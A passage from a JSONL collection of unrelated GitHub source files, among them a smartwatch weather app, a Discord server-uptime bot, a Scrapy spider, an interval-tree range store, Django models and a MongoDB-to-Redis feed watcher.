lv.img.CF.TRUE_COLOR_ALPHA},\n \"data\": app_icon_data,\n \"data_size\": len(app_icon_data),\n }\n )\n return (app_icon_data,icon_dsc)\n\n def main_page(self,tile_num):\n # create the GUI\n self.weather_app_tile = self.mainbar.get_tile_obj(tile_num);\n weather_style = lv.style_t()\n weather_style.copy(self.mainbar.get_style())\n \n weather_cont = lv.obj(self.weather_app_tile,None)\n weather_cont.set_size(lv.scr_act().get_disp().driver.hor_res,30)\n weather_cont.add_style(lv.cont.PART.MAIN,weather_style)\n \n # create date label and left right buttons\n btn_style = lv.style_t()\n btn_style.copy(weather_style)\n btn_style.set_radius(lv.btn.STATE.RELEASED,2)\n self.left_button = lv.btn(weather_cont,None)\n self.left_button.set_size(25,25)\n self.left_button.add_style(lv.btn.PART.MAIN,btn_style)\n left_label = lv.label(self.left_button,None)\n left_label.set_text(lv.SYMBOL.LEFT)\n self.left_button.align(weather_cont,lv.ALIGN.IN_LEFT_MID,5,0)\n self.left_button.set_hidden(True)\n self.left_button.set_event_cb(self.decrement_day)\n \n self.date_label = lv.label(weather_cont,None)\n self.date_label.set_text(self.date[self.day_index])\n self.date_label.align(weather_cont,lv.ALIGN.CENTER,0,0)\n \n self.right_button = lv.btn(weather_cont,None)\n self.right_button.set_size(25,25)\n self.right_button.add_style(lv.btn.PART.MAIN,btn_style)\n right_label = lv.label(self.right_button,None)\n right_label.set_text(lv.SYMBOL.RIGHT)\n self.right_button.align(weather_cont,lv.ALIGN.IN_RIGHT_MID,-5,0)\n self.right_button.set_event_cb(self.increment_day)\n\n icon_cont_style = lv.style_t()\n icon_cont_style.copy(weather_style)\n icon_cont_style.set_bg_opa(lv.obj.PART.MAIN, lv.OPA.TRANSP)\n\n icon_cont = lv.cont(self.weather_app_tile,None)\n icon_cont.set_layout(lv.LAYOUT.COLUMN_LEFT)\n 
icon_cont.add_style(lv.cont.PART.MAIN,icon_cont_style)\n icon_cont.set_fit(lv.FIT.TIGHT)\n\n self.icon = lv.img(icon_cont,None)\n key_list = list(self.icon_filename.keys())\n self.log.debug(key_list)\n index = key_list.index(self.weather_state_abbr[self.day_index])\n self.log.debug(\"index of %s: %d\"%(self.weather_state_abbr[self.day_index],index))\n self.icon.set_src(self.icon_dsc[index])\n icon_cont.align(weather_cont,lv.ALIGN.OUT_BOTTOM_LEFT,0,0)\n self.state_label = lv.label(icon_cont,None)\n self.state_label.set_width(100)\n self.state_label.set_text(self.weather_state_name[self.day_index])\n \n info_cont_style = lv.style_t()\n info_cont_style.copy(weather_style)\n info_cont_style.set_pad_top(lv.STATE.DEFAULT,6)\n info_cont_style.set_pad_inner(lv.STATE.DEFAULT,4)\n \n info_cont = lv.cont(self.weather_app_tile,None)\n info_cont.set_size(lv.scr_act().get_disp().driver.hor_res,90)\n info_cont.set_layout(lv.LAYOUT.COLUMN_LEFT)\n info_cont.add_style(lv.cont.PART.MAIN,icon_cont_style)\n info_cont.set_fit(lv.FIT.NONE)\n info_cont.align(icon_cont,lv.ALIGN.OUT_BOTTOM_LEFT,0,0)\n info_cont.add_style(lv.cont.PART.MAIN,info_cont_style)\n \n self.confidence_label = lv.label(info_cont,None)\n self.confidence_label.set_text(\"Confidence level: {}%\".format(self.predic[self.day_index]))\n self.temp_label = lv.label(info_cont,None)\n self.temp_label.set_text(\"Temp: min: %3.1f°C, max: %3.1f°C\"%(self.min_temp[self.day_index],self.max_temp[self.day_index]))\n self.humidity_label = lv.label(info_cont,None)\n self.humidity_label.set_text(\"Humidity: {}%\".format(self.humid[self.day_index]))\n self.pressure_label = lv.label(info_cont,None)\n self.pressure_label.set_text(\"Air pressure: %d hPa\"%self.air_pressure[self.day_index])\n\n info_cont2 = lv.cont(self.weather_app_tile,None)\n # info_cont2.set_size(140,120)\n info_cont2.set_layout(lv.LAYOUT.COLUMN_LEFT)\n info_cont2.add_style(lv.cont.PART.MAIN,icon_cont_style)\n info_cont2.set_fit(lv.FIT.TIGHT)\n info_cont2.align(icon_cont,lv.ALIGN.OUT_RIGHT_TOP,-5,0)\n info_cont2.add_style(lv.cont.PART.MAIN,info_cont_style)\n\n self.location_label = lv.label(info_cont2,None)\n self.location_label.set_text(\"Location: \"+self.location)\n self.wind_label = lv.label(info_cont2,None)\n self.wind_label.set_text(\"Wind:\\nspeed: %5.1f kph\\ndir: %s\"%(self.wind_speed[self.day_index],\n self.wind_direction[self.day_index]))\n\n exit_btn = lv.imgbtn(self.weather_app_tile,None)\n exit_btn.set_src(lv.btn.STATE.RELEASED,self.mainbar.get_exit_btn_dsc())\n exit_btn.set_src(lv.btn.STATE.PRESSED,self.mainbar.get_exit_btn_dsc())\n exit_btn.set_src(lv.btn.STATE.CHECKED_RELEASED,self.mainbar.get_exit_btn_dsc())\n exit_btn.set_src(lv.btn.STATE.CHECKED_PRESSED,self.mainbar.get_exit_btn_dsc())\n exit_btn.align(self.weather_app_tile,lv.ALIGN.IN_BOTTOM_RIGHT, -10,-10)\n exit_btn.set_event_cb(self.exit_weather_app_event_cb)\n \n def enter_weather_app_event_cb(self,obj,evt):\n if evt == lv.EVENT.CLICKED:\n self.log.debug(\"enter_aclock_app_event_cb called\")\n self.statusbar.hide(True)\n # self.app.hide_indicator( example_app )\n self.mainbar.jump_to_tilenumber(self.tile_num, lv.ANIM.OFF )\n \n def exit_weather_app_event_cb(self,obj,evt):\n if evt == lv.EVENT.CLICKED:\n self.log.debug(\"exit_aclock_app_event_cb called\")\n self.statusbar.hide(False)\n self.mainbar.jump_to_maintile(lv.ANIM.OFF)\n \n def increment_day(self,obj,evt):\n if evt == lv.EVENT.CLICKED:\n self.log.debug(\"increment_day called\") \n if self.day_index == MAX_DAY:\n return\n self.day_index += 1\n if self.day_index == 
MAX_DAY:\n self.right_button.set_hidden(True)\n self.left_button.set_hidden(False)\n self.update_day_info() \n\n def decrement_day(self,obj,evt):\n if evt == lv.EVENT.CLICKED:\n self.log.debug(\"decrement_day called\") \n if self.day_index == 0:\n return\n self.day_index -= 1\n if self.day_index == 0:\n self.left_button.set_hidden(True)\n self.right_button.set_hidden(False)\n self.update_day_info()\n \n def update_day_info(self):\n self.log.debug(\"update_day_info to %d\"%self.day_index)\n self.date_label.set_text(self.date[self.day_index])\n key_list = list(self.icon_filename.keys())\n self.log.debug(key_list)\n index = key_list.index(self.weather_state_abbr[self.day_index])\n self.log.debug(\"index of %s: %d\"%(self.weather_state_abbr[self.day_index],index))\n self.icon.set_src(self.icon_dsc[index])\n \n self.state_label.set_text(self.weather_state_name[self.day_index])\n self.confidence_label.set_text(\"Confidence level: {}%\".format(self.predic[self.day_index]))\n self.temp_label.set_text(\"Temp: min: %3.1f°C, max: %3.1f°C\"%(self.min_temp[self.day_index],self.max_temp[self.day_index]))\n self.humidity_label.set_text(\"Humidity: {}%\".format(self.humid[self.day_index]))\n self.pressure_label.set_text(\"Air pressure: %d hPa\"%self.air_pressure[self.day_index])\n self.location_label.set_text(\"Location: \"+self.location)\n self.wind_label.set_text(\"Wind:\\nspeed: %5.1f kph\\ndir: %s\"%(self.wind_speed[self.day_index],\n self.wind_direction[self.day_index]))\n\n def add_widget(self):\n key_list = list(self.icon_filename.keys())\n self.log.debug(key_list)\n index = key_list.index(self.weather_state_abbr[0]) # today's weather icon\n self.log.debug(\"index of %s: %d\"%(self.weather_state_abbr[self.day_index],index))\n widget = self.widget.register(self.weather_state_name[self.day_index],self.icon_dsc[index],\n self.enter_weather_app_event_cb)\n","repo_name":"uraich/twatch2020_firmware","sub_path":"src/app/weather/metaweather_app.py","file_name":"metaweather_app.py","file_ext":"py","file_size_in_byte":14058,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"23593859008","text":"class Locke():\n\n\tdef __init__(self, capacity):\n\t\tif capacity < 1:\n\t\t\traise ValueError('Capacity must be greater than zero')\n\t\tself._capacity_ = capacity\n\n\n\tdef move_boats_through(self, number):\n\t\tif number > self._capacity_:\n\t\t\traise ValueError(\"Number of boat exceeds locke capacity {}\".format(self._capacity_))\n\t\telif number < 1:\n\t\t\traise ValueError('Boat number must be greater than zero')\n\n\n\tdef __enter__(self):\n\t\tprint(\"Stopping the pumps.\")\n\t\tprint(\"Opening the doors.\")\n\t\treturn self\n\n\tdef __exit__(self, exc_type, exc_val, exc_tb):\n\t\tprint(\"Closing the doors.\")\n\t\tprint(\"Restarting the pumps.\")\n\t\tif exc_type is not None:\n\t\t\tprint('__exit__({}, {}, {})'.format(exc_type, exc_val, exc_tb))\n\t\treturn True\n\nif __name__ == \"__main__\":\n\tprint('Here')\n\tsmall_locke = Locke(5)\n\tlarge_locke = Locke(10)\n\tboats = 8\n\n\t# Too many boats through a small locke will raise an exception\n\twith small_locke as locke:\n\t locke.move_boats_through(boats)\n\n\t# A lock with sufficient capacity can move boats without incident.\n\twith large_locke as locke:\n\t 
locke.move_boats_through(boats)\t\t\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/Zhengtang_Yang/lesson03/locke.py","file_name":"locke.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13040031527","text":"import socket\r\nimport time\r\nimport discord\r\nimport asyncio\r\nfrom discord.ext import commands\r\n\r\n# Get the current Unix time\r\ndef get_unix_time():\r\n    unix_time = int(time.time())\r\n    return unix_time\r\n\r\nunix = get_unix_time()\r\nprint(unix)\r\n\r\n\r\n# Set the Discord token\r\nDISCORD_TOKEN = \"BOTTOKEN\"\r\n\r\n# Hostname or IP address and port number to monitor\r\nhost = \"192.168.3.100\"\r\nport = 8250\r\n\r\n# Create the Discord bot\r\nintents = discord.Intents.all()\r\nbot = commands.Bot(command_prefix='!', intents=intents)\r\n\r\n@bot.event\r\nasync def on_ready():\r\n    print(\"Logged in\")\r\n    # Start monitoring the port state (merged here from a duplicate on_ready handler that would have silently overridden this one)\r\n    bot.loop.create_task(port_check_task())\r\n\r\n@bot.event\r\nasync def on_disconnect():\r\n    print(\"Disconnected\")\r\n\r\n# Task that monitors the state of the target port\r\nasync def port_check_task():\r\n    last_state = None\r\n\r\n    while True:\r\n        state = await check_port_state()\r\n        if state != last_state:\r\n            last_state = state\r\n            await send_discord_message(state)\r\n        await asyncio.sleep(1)\r\n\r\n# Function that checks the port state\r\nasync def check_port_state():\r\n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n    sock.settimeout(1)\r\n\r\n    try:\r\n        sock.connect((host, port))\r\n        return f\" The server is back up.\"\r\n    except socket.error:\r\n        return f\" The server went down. Please wait a while for it to recover. @here\"\r\n    finally:\r\n        sock.close()\r\n\r\n# Async function that sends a message to Discord\r\nasync def send_discord_message(msg):\r\n    channel = bot.get_channel(channelid) # Set your Discord channel ID here\r\n    await channel.send(msg)\r\n\r\n# Run the Discord bot\r\nbot.run(DISCORD_TOKEN)\r\n","repo_name":"choko1229/MinecraftAliveMonitoring","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41526814016","text":"import scrapy\nimport boto3\nimport json\n\nclass CrawlRB(scrapy.Spider):\n\n    name = 'recruiterbox'\n    \n    def start_requests(self):\n        sqs = boto3.resource('sqs')\n        queue = sqs.get_queue_by_name(QueueName='RECRUITER_BOX_SUB_DOMAINS')\n        while True:\n            # url = \n            yield self.make_requests_from_url(\n                str(json.loads(queue.receive_messages()[0].body).get('url'))\n            )\n    \n    def parse(self, response):\n        print(response)","repo_name":"masai-oss/joboid","sub_path":"job_collection/job_collection/spiders/recruiterbox.py","file_name":"recruiterbox.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8066353248","text":"#Basics\n\n#Assignment \nvariable = 0; \nvariable = \"zero\"; \nvariable = False; \nvariable = '0'; \nvariable = 0.0; \nvariable = bytes; \n\n#Operations: \n\n#Integers and Decimals (int / float or double) : \na = 5; \nb = 10; \n\nc = a*b; print (\">>>\" , c); \nc = a + b; print(\">>>\" , c); \na+= b; print(\">>>\",a); \nb*=a; print(\">>>\",b);\n\n#CAREFUL WITH DIVISION\na/=b; print(\">>>\",a);#Integer\na = 15; \na = float(a)/b; print(\">>> \", a 
);#Decimal\n\n\n\n\n","repo_name":"Onnion191/TutorialsCustom","sub_path":"TutorialsCustom/TutorialsCustom.py","file_name":"TutorialsCustom.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22795036766","text":"from sys import stdin\ninput = stdin.readline\n\nif __name__ == \"__main__\":\n    n = int(input())\n    R,G,B = 0,1,2\n    costs = [list(map(int,input().split())) for _ in range(n)]\n    dp = [[0,0,0] for _ in range(n)] # minimum cumulative cost when the i-th house is painted R, G, or B\n    dp[0] = costs[0]\n    for i in range(1,n):\n        dp[i][R] = min(dp[i-1][G], dp[i-1][B]) + costs[i][R]\n        dp[i][G] = min(dp[i-1][R], dp[i-1][B]) + costs[i][G]\n        dp[i][B] = min(dp[i-1][R], dp[i-1][G]) + costs[i][B]\n    print(min(dp[n-1]))","repo_name":"choieastsea/alg","sub_path":"acmipc/1149_RGB(DP)/1149.py","file_name":"1149.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28843956376","text":"from typing import List\r\n\r\nclass Node: \r\n\tdef __init__(self,data): \r\n\t\tself.left = None\r\n\t\tself.right = None\r\n\t\tself.range = data \r\n\r\nclass Ranges(object):\r\n\r\n\tdef __init__(self):\r\n\t\tself.tree = None\r\n\t\r\n\tdef _rangeCheck(self, start:int, end:int) -> bool:\r\n\t\t\"\"\"\r\n\t\tCheck if a given range is valid. It is assumed that a valid range will have \r\n\t\tan initial value that is smaller than the end value. If both values are equal, \r\n\t\tit is not considered a valid range.\r\n\t\t:param start: Start of the range (inclusive)\r\n\t\t:param end: End of the range (exclusive)\r\n\t\t:return True if the range is valid, False otherwise\r\n\t\t\"\"\"\r\n\t\treturn start < end\r\n\t\t\t\r\n\t\r\n\tdef display(self):\r\n\t\t\"\"\"\r\n\t\tDebugging function, displays the tree structure containing the stored ranges.\r\n\t\t\"\"\"\r\n\t\tdef displayTree(node:Node):\r\n\t\t\tif node:\r\n\t\t\t\tdisplayTree(node.left)\r\n\t\t\t\tprint(node.range)\r\n\t\t\t\tdisplayTree(node.right)\r\n\t\tprint(\"Displaying tree:\")\r\n\t\tdisplayTree(self.tree)\r\n\t\t\r\n\tdef _findIntersect(self, node:Node, start:int, end:int) -> (Node, Node, bool):\r\n\t\tparent = None\r\n\t\tisLeft = False\r\n\t\twhile node:\r\n\t\t\tif end <= node.range[0]:\r\n\t\t\t\tparent = node\r\n\t\t\t\tnode = node.left\r\n\t\t\t\tisLeft = True\r\n\t\t\telif start >= node.range[1]:\r\n\t\t\t\tparent = node\r\n\t\t\t\tnode = node.right\r\n\t\t\t\tisLeft = False\r\n\t\t\telse:\r\n\t\t\t\treturn (node, parent, isLeft)\r\n\t\tif not node:\r\n\t\t\treturn None\r\n\t\t\t\r\n\t\t\t\r\n###########################################################################\t\r\n\t\t\r\n\t\t\r\n\tdef get(self, start:int, end:int) -> List:\r\n\t\t\"\"\"\r\n\t\tReturns a list of ranges contained in the data that intersect with\r\n\t\t'start' and 'end'. 
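For example, with stored ranges (1, 5) and (8, 12), a call such as get(4, 9) would return both ranges. 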
Complexity O(log n), could be O(n) in the worst case.\r\n\t\t:param start: Start of the range (inclusive)\r\n\t\t:param end: End of the range (exclusive)\r\n\t\t:return List of ranges that intersect\r\n\t\t\"\"\"\r\n\t\tresults = []\r\n\t\tdef searchTree(node) -> List:\r\n\t\t\tif not node:\r\n\t\t\t\treturn None\r\n\t\t\tif end <= node.range[0]:\r\n\t\t\t\tsearchTree(node.left)\r\n\t\t\telif start >= node.range[1]:\r\n\t\t\t\tsearchTree(node.right)\r\n\t\t\telse:\r\n\t\t\t\tif start < node.range[0]:\r\n\t\t\t\t\tsearchTree(node.left)\r\n\t\t\t\tresults.append(node.range) \r\n\t\t\t\tif end > node.range[1]:\r\n\t\t\t\t\tsearchTree(node.right)\r\n\t\t\t\t\t\r\n\t\tif self._rangeCheck(start, end) and self.tree :\r\n\t\t\tx = self._findIntersect(self.tree, start, end)\r\n\t\t\tif x:\r\n\t\t\t\t(node, parent, isLeft) = x\r\n\t\t\t\tsearchTree(node)\t\r\n\t\treturn results\t\t\r\n\r\n\t\r\n###########################################################################\t\r\n\r\n\tdef add(self, start:int, end:int):\r\n\t\t\"\"\"\r\n\t\tAdds a new range into the data structure from 'start' to 'end'. \r\n\t\tInternally, it calls the inner function _addToTree.\r\n\t\t:param start: Start of the range (inclusive)\r\n\t\t:param end: End of the range (exclusive)\r\n\t\t\"\"\"\r\n\t\tif not self._rangeCheck(start, end):\r\n\t\t\treturn\r\n\t\tif not self.tree:\r\n\t\t\tself.tree = Node((start,end)) \r\n\t\telse :\r\n\t\t\tself._addToTree(self.tree, start, end)\r\n\t\r\n\tdef _addToTree(self, node:Node, start:int, end:int):\r\n\t\t\"\"\"\r\n\t\tThis function searches through the tree until it finds a range that \r\n\t\tintersects with the new range we want to add. Upon finding it, it \r\n\t\tcalls upon _leftMerge and/or _rightMerge to update the current node, \r\n\t\tas well as it's children and exits.\r\n\t\t:param node: Node containing the range we are evaluating.\r\n\t\t:param start: Start of the range (inclusive)\r\n\t\t:param end: End of the range (exclusive)\r\n\t\t\"\"\"\r\n\t\tdone = False\r\n\t\tmerge = False\r\n\t\twhile not done:\r\n\t\t\t# Check if new range is smaller than current range\r\n\t\t\tif end <= node.range[0] :\r\n\t\t\t\tif node.left:\r\n\t\t\t\t\tnode = node.left\r\n\t\t\t\telse:\r\n\t\t\t\t\tnode.left = Node((start,end))\r\n\t\t\t\t\tdone = True\r\n\t\t\t# Check if new range is larger than current range\r\n\t\t\telif start >= node.range[1]:\r\n\t\t\t\tif node.right:\r\n\t\t\t\t\tnode = node.right\r\n\t\t\t\telse:\r\n\t\t\t\t\tnode.right = Node((start,end))\r\n\t\t\t\t\tdone = True\r\n\t\t\t# New range intersects with current range\r\n\t\t\telse:\r\n\t\t\t\tmerge = True\r\n\t\t\t\tdone = True\r\n\t\tif merge:\r\n\t\t\tif start < node.range[0]:\r\n\t\t\t\tself._leftMerge(node, start, end)\r\n\t\t\tif end > node.range[1]:\r\n\t\t\t\tself._rightMerge(node, start, end)\r\n\t\t\t\t\r\n\t\r\n\t\r\n\tdef _leftMerge(self, node:Node, start:int, end:int):\r\n\t\t\"\"\"\r\n\t\tThis function updates the starting point of the range, and evaluates \r\n\t\tthe left side of the tree starting from 'node'. Average time complexity \r\n\t\tis O(log n). 
It can degrade to O(n) in case the tree degenerates into a list.\r\n\t\t:param node: Node containing the range we are evaluating.\r\n\t\t:param start: Start of the range (inclusive)\r\n\t\t:param end: End of the range (exclusive)\r\n\t\t\"\"\"\r\n\t\tmin = start \r\n\t\tprev = node\r\n\t\ttmp = node.left\r\n\t\tisLeftChild = True \r\n\t\twhile tmp :\r\n\t\t\tif min >= tmp.range[1]:\r\n\t\t\t\tprev = tmp\r\n\t\t\t\ttmp = tmp.right\r\n\t\t\t\tisLeftChild = False\r\n\t\t\telse:\r\n\t\t\t\tif min > tmp.range[0]:\r\n\t\t\t\t\tmin = tmp.range[0]\r\n\t\t\t\ttmp = tmp.left\r\n\t\t\t\tif isLeftChild:\r\n\t\t\t\t\tprev.left = tmp\r\n\t\t\t\telse:\r\n\t\t\t\t\tprev.right = tmp\r\n\t\tnode.range = (min,node.range[1])\r\n\t\t\r\n\t\t\r\n\tdef _rightMerge(self, node: Node, start:int, end:int):\r\n\t\t\"\"\"\r\n\t\tThis function updates the end point of the range, and evaluates the \r\n\t\tright side of the tree starting from \"node\". Complexity O(log n), \r\n\t\tcould be O(n) in the worst case. \r\n\t\t:param node: Node containing the range we are evaluating.\r\n\t\t:param start: Start of the range (inclusive)\r\n\t\t:param end: End of the range (exclusive)\r\n\t\t\"\"\"\r\n\t\tmax = end \r\n\t\tprev = node\r\n\t\ttmp = node.right\r\n\t\tisRightChild = True\r\n\t\twhile tmp:\r\n\t\t\tif max <= tmp.range[0]:\r\n\t\t\t\tprev = tmp\r\n\t\t\t\ttmp = tmp.left\r\n\t\t\t\tisRightChild = False\r\n\t\t\telse:\r\n\t\t\t\tif max < tmp.range[1]:\r\n\t\t\t\t\tmax = tmp.range[1]\r\n\t\t\t\ttmp = tmp.right\r\n\t\t\t\tif isRightChild:\r\n\t\t\t\t\tprev.right = tmp\r\n\t\t\t\telse:\r\n\t\t\t\t\tprev.left = tmp\r\n\t\tnode.range = (node.range[0], max)\r\n\r\n\r\n\r\n###########################################################################\t\t\r\n\tdef delete(self, start:int, end:int):\r\n\t\t\"\"\"\r\n\t\tDeletes the range from 'start' to 'end' from the data structure. Internally, \r\n\t\tit calls upon the inner function 'deleteFromTree' which has an average time complexity\r\n\t\tO(log n); it could be O(n) in the worst case. 
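For example, deleting (3, 7) from a stored range (1, 10) leaves the two ranges (1, 3) and (7, 10).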
\r\n\t\t:param start: Start of the range (inclusive)\r\n\t\t:param end: End of the range (exclusive)\r\n\t\t\"\"\"\r\n\t\tdef deleteFromTree(parent:Node, node:Node, isLeft:bool, start:int, end:int):\r\n\t\t\tif not node:\r\n\t\t\t\treturn\r\n\t\t\tif end <= node.range[0] :\r\n\t\t\t\tdeleteFromTree(node, node.left, True, start, end)\r\n\t\t\telif start >= node.range[1]:\r\n\t\t\t\tdeleteFromTree(node, node.right,False, start, end)\r\n\t\t\t# Intersects with deletion range\r\n\t\t\telse:\r\n\t\t\t\tnewLeft = None\r\n\t\t\t\tnewRight = None\r\n\t\t\t\t\r\n\t\t\t\tif start > node.range[0]: \r\n\t\t\t\t\tnewLeft = Node((node.range[0], start))\r\n\t\t\t\t\tnewLeft.left = node.left\r\n\t\t\t\telse:\r\n\t\t\t\t\tnewLeft = node.left\r\n\t\t\t\t\t\r\n\t\t\t\tif end < node.range[1]: \r\n\t\t\t\t\tnewRight = Node((end, node.range[1]))\r\n\t\t\t\t\tnewRight.right = node.right\r\n\t\t\t\telse:\r\n\t\t\t\t\tnewRight = node.right\r\n\t\t\t\t\t\r\n\t\t\t\tif newLeft:\r\n\t\t\t\t\ttmp = newLeft\r\n\t\t\t\t\twhile tmp.right:\r\n\t\t\t\t\t\ttmp = tmp.right\r\n\t\t\t\t\ttmp.right = newRight\r\n\t\t\t\telse:\r\n\t\t\t\t\tnewLeft = newRight\r\n\t\t\t\t\r\n\t\t\t\t# We are dealing with root (no parent)\r\n\t\t\t\tif not parent:\r\n\t\t\t\t\tself.tree = newLeft\r\n\t\t\t\t# Parent is not root\r\n\t\t\t\telse:\r\n\t\t\t\t\tif isLeft:\r\n\t\t\t\t\t\tparent.left = newLeft\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tparent.right = newLeft\r\n\t\t\t\tdeleteFromTree(parent, newLeft, isLeft, start, end)\r\n\r\n\t\r\n\t\tif self._rangeCheck(start, end) and self.tree:\t\t\t\r\n\t\t\tx = self._findIntersect(self.tree, start, end)\r\n\t\t\tif x:\r\n\t\t\t\t(node, parent, isLeft) = x\r\n\t\t\t\tdeleteFromTree(parent, node, isLeft, start, end)\t\r\n\r\n\t\t\r\n\r\n\t\t\r\n\t","repo_name":"serdaigle/ranges","sub_path":"range.py","file_name":"range.py","file_ext":"py","file_size_in_byte":7390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18314855125","text":"import csv\n\ndef parseData(file_to_open):\n points = {}\n with open(file_to_open) as f:\n for name, x, y in csv.reader(f, delimiter=\" \"):\n points[name] = (x,y)\n return points\n\nif __name__ == '__main__':\n parseData(\"data/pb005.txt\")\n","repo_name":"SylvainRamseyer/GeneticAlgo","sub_path":"DataParser.py","file_name":"DataParser.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26327326719","text":"import json\r\nfrom html.parser import HTMLParser\r\nimport json\r\n\r\n\r\nclass Parser(HTMLParser):\r\n lines = [\"\"]\r\n\r\n def handle_starttag(self, tag, attrs):\r\n pass\r\n\r\n def handle_endtag(self, tag):\r\n if tag != 'span':\r\n self.lines.append(\"\")\r\n\r\n def handle_data(self, data):\r\n self.lines[-1] += data + ' '\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = Parser()\r\n filenumber = 25\r\n with open(f\"search_results/pages/{filenumber}.json\", encoding='utf8') as file:\r\n data = json.load(file)\r\n page_source = data['response']['result']['SourceD']\r\n page = parser.feed(page_source)\r\n for line in parser.lines:\r\n print(line)\r\n","repo_name":"LLinville/misc_code","sub_path":"Ian_Cyrillic/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23332641336","text":"from django.db import models\nfrom django.core.validators import RegexValidator\n\nclass 
PriceField(models.DecimalField):\n    \n    # Override the __init__ method to set some default arguments\n    def __init__(self, *args, **kwargs):\n        kwargs.setdefault(\"max_digits\", 10)\n        kwargs.setdefault(\"decimal_places\", 2)\n        kwargs.setdefault(\"blank\", True)\n        kwargs.setdefault(\"null\", True)\n\n        super().__init__(*args, **kwargs)\n\n    # Override the pre_save method to calculate the price before saving\n    def pre_save(self, model_instance, add):\n        \"\"\"Calculate the price of a restaurant based on its size category.\"\"\"\n\n        # Get the size category (the S/M/H choice stored in the 'cuisine' field) from the model instance\n        size = model_instance.cuisine\n\n        # Define some constants for calculation\n        BASE_PRICE = 10.0\n        SIZE_FACTOR = {\"S\": 1.0, \"M\": 1.2, \"H\": 1.4}\n\n        # Calculate the price based on the size factor\n        price = BASE_PRICE * SIZE_FACTOR[size]\n\n        # Round the price to two decimal places\n        price = round(price, 2)\n\n        # Set the price attribute of the model instance\n        setattr(model_instance, self.attname, price)\n        # Return the price value\n        return price\n\n    \n\nclass Restaurant(models.Model):\n    name = models.CharField(max_length=100)\n    address = models.CharField(max_length=200)\n    PHONE_REGEX = r'^\\+?1?\\d{9,10}$'\n    phone_validator = RegexValidator(regex=PHONE_REGEX, message=\"Phone number must be entered in the format: '+999999999'. Up to 10 digits allowed.\")\n    phone = models.CharField(validators=[phone_validator], max_length=10, blank=True)\n    \n    CUISINE_CHOICES = [\n        ('S',\"low\"),\n        ('H',\"high\"),\n        ('M',\"medium\")\n    ]\n    cuisine = models.CharField(max_length=1, choices=CUISINE_CHOICES) \n    \n    rating = models.FloatField(max_length=50)\n    REVIEW_CHOICES = [\n        ('S',\"low\"),\n        ('H',\"high\"),\n        ('M',\"medium\")\n    ]\n    reviews = models.CharField(max_length=1,choices=REVIEW_CHOICES)\n    price = PriceField(blank=True, null=True)\n","repo_name":"shakkeelbhat/django-custom_model_fields","sub_path":"myproject/home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3996173424","text":"import os\nimport sys\nimport redis\nimport pymongo\nimport concurrent.futures\nfrom dotenv import load_dotenv\nfrom pymongo import MongoClient\n\nload_dotenv()\n\nREDIS_PREFIX = os.getenv('REDIS_PREFIX', 'user:')\n\n# TODO: Remove duplicate vibes\n\ndef watchInsertVibes():\n    \"\"\" Watch `vibes` collection \"\"\"\n    try:\n        print('Connecting to the MongoDB database...')\n        mongodbUrl = os.getenv('MONGODB_URL')\n        client = MongoClient(mongodbUrl)\n        #db = client.ahunbackup\n        db = client.ahuntest\n\n        # Redis connection\n        print('Connecting to the Redis database...')\n        r = redis.Redis(host=os.getenv('REDIS_HOST'), port=os.getenv('REDIS_PORT'))\n    except pymongo.errors.ServerSelectionTimeoutError as err:\n        print(err)\n        sys.exit(1)\n\n    # Listen to mongodb changes\n    while True:\n        try:\n            for insert_change in db['vibes'].watch(\n                [{'$match': {'operationType': 'insert'}}]\n            ):\n                # Contains ids of followers\n                # Treat the current user (the poster) as a follower so the vibe also lands in their own feed\n                followers = [ insert_change['fullDocument']['user'] ]\n                # Append at the top of all followers\n                # Get user's followers\n                for f in db['useredges'].find({'destination': insert_change['fullDocument']['user']}):\n                    followers.append(f['source'])\n                    # Get follower activity type\n                    if db['users'].find({'_id': f['source'], 'interests': {'$in': insert_change['fullDocument'].get('activityType', [])}}).count() > 0:\n                        r.lpush(REDIS_PREFIX + str(f['source']) + 
':recommended-high', str(insert_change['fullDocument']['_id']))\n                    else:\n                        r.lpush(REDIS_PREFIX + str(f['source']) + ':recommended-medium', str(insert_change['fullDocument']['_id']))\n\n                for f in db['users'].find({'_id': {'$nin': followers}}):\n                    r.lpush(REDIS_PREFIX + str(f['_id']) + ':recommended-reserve', str(insert_change['fullDocument']['_id']))\n\n                # TODO: add snapshot in order to restart from the previous watch \n        except Exception as ex:\n            # TODO: log the exception\n            print(ex)\n\n\ndef watchDeleteVibes():\n    \"\"\" Watch `vibes` collection deletion \"\"\"\n    try:\n        print('Connecting to the MongoDB database...')\n        mongodbUrl = os.getenv('MONGODB_URL')\n        client = MongoClient(mongodbUrl)\n        #db = client.ahunbackup\n        db = client.ahuntest\n\n        # Redis connection\n        print('Connecting to the Redis database...')\n        r = redis.Redis(host=os.getenv('REDIS_HOST'), port=os.getenv('REDIS_PORT'))\n    except pymongo.errors.ServerSelectionTimeoutError as err:\n        print(err)\n        sys.exit(1)\n\n    while True:\n        